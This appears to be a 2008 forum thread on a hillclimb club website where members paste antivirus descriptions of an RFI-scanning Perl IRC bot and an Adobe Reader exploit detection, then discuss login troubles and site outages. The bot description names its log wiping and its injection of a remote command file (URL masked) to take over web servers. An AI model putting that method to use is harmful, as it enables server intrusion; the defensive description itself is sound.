PA Hillclimb

Found this tid bit of info while updating my ZoneAlarm firewall:

Virus Name: HackTool.Perl.IrBot.d


Date Detected: 09 Nov 2007 22:25:00 +0300


Date Published: 04 Aug 2008 13:22:00 +0300


Date Modified: 04 Aug 2008 13:26:06 +0300


Technical details:
This malicious program is a hacking utility. It is a Perl script. The size of infected files may vary from 12KB to 69KB.



Payload:
This script is an IRC bot which is used to search for Remote File Inclusion (RFI) vulnerabilities.

Depending on the commands received, the bot can:

wipe log files
search for sites with RFI vulnerabilities. In order to find a site, the bot is given a keyword. It then uses the keyword with the following search services:
http://www.google.nl
http://busca.uol.com.br
http://www.alltheweb.com
http://it.ask.com
http://search.aol.com
http://suche.fireball.de
http://search.lycos.com
http://arianna.libero.it
http://search.yahoo.com
http://search.live.com
If sites are found which contain the substrings "buterfly" and "uid=" in the address, the malicious program ctreats a request which redirects the address to the following link:

http://linknet*****.com/source/cmd.txt?
The contents of this file will then be run on the site's web server. This provides the remote malicious user with access to the server.

The script also contains the following string:

Yogya Ceria Scaner Bot Created By eviL-Zone -= evil =-


Removal instructions:
If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program:

Delete the original malicious program file (the location will depend on how the program originally penetrated the victim machine).
Update your antivirus databases and perform a full scan of the computer ( download a trial version of Kaspersky Anti-Virus).

I have not seen the adobe problem today BUT, when I come on the website I continue to get a message that Norton has protected me from "Bloodhound.Exploit.196" whatever that is. I am not a computer wiz, but it looks like this site is infected.

I was getting the same blocked virus as Joe. And now I can't log on at home. The same problem as a few months back, I keep getting booted back to the login page. It's working fine from the iPhone tho

Paul Behofist had the exact same problem.

Discovered: August 6, 2008
Updated: August 7, 2008 4:31:05 AM
Type: Trojan, Virus
Infection Length: Varies
Systems Affected: Windows 98, Windows 95, Windows XP, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Windows 2000
CVE References: CVE-2007-5666, CVE-2008-0655, CVE-2008-0726, CVE-2008-2042, CVE-2007-5659, CVE-2007-5663, CVE-2008-0667

Bloodhound.Exploit.196 is a heuristic detection for files attempting to exploit the Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities (BID 27641).

Files that are detected as Bloodhound.Exploit.196 may be malicious


Read more here: http://www.symantec.com/security_respon ... 99&tabid=2

Matt Rowe, are you reading this? Any comment? Will this threat be eliminated?

I have gotten a comment about some folks unable to log on. Mark Aubel for sure. And there is a good possibility that Jeremy Dietzel too. Could someone check into that please?
Mark, if you're reading this, maybe make a new log in name and try that.

Yes there are issues with the site. Internet explorer seems to be the issue. I'm signed on with firefox and it seems to work fine.

Jeremy,

Try deleting all cookies (it's in internet options), I was having the same problems, and this fixed it. Steve L. suggested I try it, and it works, thanks Steve!

NP Mark. Glad to help.

I case you didn't notice, the site was down for maintainence on Saturday.

It worked. I'm flyin!

Dave Y

Matt,

I have noticed(maybe I'm just crazy) that after Saturday, I feel like the site is a little more responsive. Just wanted to post something positive since we typically only post when something is wrong. Thanks.

Matt ,

I don't know if you will get time to read this this before the PHA meeting, but I need to make a public appology for any comments or accusations that I have made that may have blamed you for difficulties that we have experienced with the web site. I am so illiterate when it comes to computers that I should not be insulting anyone for not making it stupid proof enough for someone like me to use.

One of the things I don't understand is who runs what? I thought we had an outside expert that took care of all this stuff. I didn't realize I was dumping on one of our own volunteers.

I want to say I am sorry for being crass, impatient, insulting and a general Ass Hole. Maybe everybody else knows my faults already but I'll only admit that to you.

Dave Y

Dave,

You don't want to know what happens and how it works. It's very complex and all ya need to know is every once in a while the website needs a tune up. Kind of like your pc, for instance. When was the last time you cleared all your temp files, cookies and history?? When was the last time you did a defrag? Updated your firewall or antivirus? It's a good idea to do those things, with the exception of the defrag. If you aren't deleting files all the time, you won't need it but once a month or once every 3 months.

Wow! Major hiccup in the site.

Matt. Can you PM me with some info regarding site administration please? I need to understand what gets done and who does it. Thanks

Site back up and running. Weeeeeeeeeee!!! Thanks to whoever fixed it. Anyone have a clue what was up???

I was away for the holiday and came back to find some corrupted files. Sorry for the downtime while I was out of touch.

Matt,
I find it hard to believe that you are ever out of touch. Rumor has it that Yeager was suffering from severe anxiety during the time this site was down and needed to have some oxygen treatments. The doctors said it was an extremely bad case of "FORUMITIS." Not to be confused with ROLLBARITIS and RECORDITIS.

I"M OKAY. I told the doctors they could take off the straight jacket now that the forum is back up. Thank you all for the direct emails and phone calls making sure that I was okay in during the outage. I kept myself busy by posting on other forums. By the way, the BMR site is working pretty good now. No traffic at this point but maybe it will grow.

WELCOME BACK!
Dave Y.

Dave and I were going through withdraw! Thanks Matt!